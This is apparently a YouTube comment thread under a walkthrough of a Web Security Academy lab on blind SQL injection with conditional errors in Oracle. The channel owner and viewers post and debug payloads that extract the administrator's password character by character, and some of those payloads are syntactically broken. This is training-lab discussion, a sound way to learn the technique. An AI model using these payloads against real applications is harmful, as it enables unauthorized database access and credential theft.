Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨
@RanaKhalil1013 жыл бұрын
After recording the video, I realized the SQL payload can be much more simple. We don't need a CASE expression in order for it to work. The following is the alternative payload: ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| '
@ahmedsaleem93273 жыл бұрын
Great Video. Can we use AND instead of concatenation? i am unable to understand that why haven't we used AND
@mileke0 Жыл бұрын
@@ahmedsaleem9327 Yes. AND works as well.
@vinigreen3 ай бұрын
How does this ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| ' --- works exactly? I mean, i think that if the SUBSTR is true then you will select the 1/0 and get the error message, which is what we want. But in the case that the password 1,1 is not A, then the clause is False, which is also leading to error, right? So how does this works?
@ZTechSecurityАй бұрын
Why can't we use ' and (select ...)-- i am confused at this point ' and (select TO_CHAR(1/0) FROM users WHERE username='administrator')-- this shows error whether table or value exists or not. please explain a little.
@souravpaul_perКүн бұрын
thank you maam..i think this comment should be pinned at the top..
@Zephyr-tg9hu2 жыл бұрын
Noticed that there were a couple people who were wondering why the solution for this lab uses concatenation: Doesn't matter what technique you use, this lab simply introduces a new technique that uses string concatenation instead of an equality check. You could just as easily do this lab using previous techniques. Eg. Instead of: '||(SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)||' We could have: ' AND (SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)=''-- Concatenation simply leads to a more simple solution in this case, so it is quicker to use.
@anirudhsaxena9214 Жыл бұрын
||(select+username+from+users+where+username%3d'administrator')|| this statment doesnt gives an internal error that means administrator exits in the table right ?
@user-h8m Жыл бұрын
@@anirudhsaxena9214 i guess the purpose here is to get an error if you do not get it so the condition is true and passe to the second part of the condition -->' ' =blank It means that every think is alright and the administrator user does not exist.
@alla-turca11 ай бұрын
could we use the same payload as the previous video instead of trying to do 1/0 or case keyword? for example we did "and (select username from users where username = 'administrator') = 'administrator'--" wouldnt this work here as well? if not why?
@souravpaul_perКүн бұрын
thank you for explaining that
@mih4743 Жыл бұрын
Excellent video. My eWPT cert is in 4 weeks, so can't thank you enough for your videos & effort of quality educationally content you put out. Method I found I'm able to learn, regardless of it being tedious ( the method, not content ), it allows retention for those struggling with the information sticking, because this stuff is hard lol but you've done us a great service: Method: 1. Solo Attempt 2. Watch Video ( as a lecture ) 3. Re-Attempt ( still without video ) 4. Complete with Video ( side by side ) 5. 3rd Attempt (without the video )
@sscoconut12659 ай бұрын
did you pass bro?
@shamanwolf13354 ай бұрын
I had hard time understanding why we still get an error while 1=1 and we have a user called administrator. Then you explained how SQL queries worked and bingo! I instantly understood! Thank you so much!!
@mahmoudchiboub82133 жыл бұрын
Hi, can you please tell why did we need to use the concatenate operator in this case and why we didn't use the comment operator to ignore the apostrophe.
@MohammedAhmed-id1ry2 жыл бұрын
تقدر تعملها ب AND تقريبا مش هتفرق كثير بس ده تكنيك تاني
@x7331x11 ай бұрын
Amazing explanation of why the query for finding if the admin user exists works. Keep it up 👆 !
@marcschweiz2 жыл бұрын
Great stuff Rana. I bought your course to support you! Thank you for your time on these videos...
@RanaKhalil1012 жыл бұрын
Thank you for your support!
@nishanahmed53183 жыл бұрын
Eagerly waited for your walkthrough
@melisaozen48979 ай бұрын
Perfect, love your detailed explanations! Thank you ☺ 🙏
@vuongnguyenminh95842 жыл бұрын
Thank you so much for these videos, they are easy to understand and learn!
@BigHeadEddie3 жыл бұрын
I did the lab before this one called "Blind SQL injection with conditional responses". I didn't have to concatenate in that lab. I am not sure why concatenation was necessary in this lab. Can you explain?
@0xPr3d4T0r2 жыл бұрын
Underrated channel👏
@Abhishekn._3 жыл бұрын
nice explanations , waiting for the rest of the videos also
@acronproject Жыл бұрын
Thanks for this Ms.Khalil
@padaloni3 жыл бұрын
Great video. Its really refreshing listening to a female voice in pentesting videos. So much nicer on the ears :) Also your explanations are on point and simple to understand. Keep it up :)
@masicre95742 жыл бұрын
It will be really helpful if you could make a video to get a clear idea on DOM xss
@iluzdd2 жыл бұрын
Great work, your videos are really helpful. I just didn't understand why you decided to concatenate? Is this an obvious move for Blind SQLi?
@lollocanzo563311 ай бұрын
Hey, I have a question. Since in this case it's an Oracle database, not knowing the syntax, after having found the parameter vulnerable to injection and having made sure that it was vulnerable by seeing if it interpreted what was passed as a query, I passed everything to the sqlmap obviously specifying the injection point, is this a good thing in your opinion?
@starchild_36933 жыл бұрын
Salamu Alaykoum Rana how are you? what an amazing walk through you make it as it was so easy! Unbelievable skills. Thank you by the way. Do you recommend learning SQL? I don't have much SQL Knowledge. Thank you again.
@7Arunkumar Жыл бұрын
hi @rana Khali, I do watched your basic video, in previous video we used conditional responses and now we are using different one., can we use old method as well?
@brunuusamadio2 жыл бұрын
tks, amazing video!!
@nvssairam57543 жыл бұрын
Why cant we follow the same steps here what we follow in Blind SQLi with conditional response , because the difference of conditional error and response is that there if true we get WELCOME message else NO MESSAGE but here if true NO ERROR else ERROR. TYIA
@ahmedsaleem93273 жыл бұрын
same question
@user-h8m Жыл бұрын
I guess because the DB is Oracle based
@eladbruchim21482 жыл бұрын
Hey Rana, Thanks for that amazing video explanation! Can you please explain how the function of 'TO_CHAR' is manifested on the query?
@PeterCoder027 ай бұрын
Hi, Ms. Khalil. Can you help me figure out the difference between conditional response and conditional errors in SQL Injection, please? This confused me. Thanks.
@user-h8m Жыл бұрын
i barely understood the logic of this kind of sql injection in Oracle ...but what i would like to know if there is the same trigerreing errors for sql database ?
@mohdaadilf Жыл бұрын
Here's a very peculiar error- '|| (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) ||-- Using comments at the end with the concatenation doesn't work. However what does work is using comments without the concatenation string: ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) -- Anyone know why that is?
@nadir2k3 жыл бұрын
did you just reupload this?
@RanaKhalil1013 жыл бұрын
Nope. This is the short version that will be linked to from the official Web Security Academy website.
@siddhant503 жыл бұрын
Great!
@thinhdang9256 Жыл бұрын
someone can explain to me why this challenge don't use this -- at the end of a sentence like other challenges
@zzzzzzzzZzZZzzzaZzz Жыл бұрын
How i'Know the Type of database ?
@feritkardal2 жыл бұрын
08:30 i didn't understand why it doesn't work without rownum and why we used the rownum=1
@ZoMbiE4CoBRA Жыл бұрын
because the query will return ' ' for every entity in the users table, the returned query will be like this for example if there are 3 users: row Num | 1 | ' ' 2 | ' ' 3 | ' ' it is important to note that by i mean the ' ' in the select statement (select ' ' from users)
@hackerninjaking2617 Жыл бұрын
it took me three days to solve this lab😅😅😅
@wahid_cyril92442 жыл бұрын
how to exploit database MYSQL ? please give me video for exploit database mysql 🙏
@anirudhsaxena9214 Жыл бұрын
can someone explain me the significance of ' ' not ' please i am confused in that
@user-h8m Жыл бұрын
I guess the ' ' means that every thing is ok and does not display any message if the first condition is true.. So it returns https 200
@adilhashmi76086 ай бұрын
we can perform this attack's using ffuf tool
@vaibhavsuri2389 Жыл бұрын
Hi Rana Thanks for sharing such helpful videos but I need your help with this challenge I am using the below query to find the password length ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) || ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>50) || In both cases I am getting 500 response I am following the same steps which you have did in this video, can you please help me in this issue
@mohdaadilf Жыл бұрын
Have you closed the query? From what you've posted, the syntax is wrong. You've an open quote-mark, but haven't closed it. Either add a single quote to comment out after the length function without concatenation. ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) || ' or ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) --
@milosmarkovic4566 Жыл бұрын
Just add ' at the end of the query
@melantheoszimurri99818 ай бұрын
Why are your using solutions that go more inline with what the labs are teaching. There’s no way a beginner is going to know all of these different commands you are using.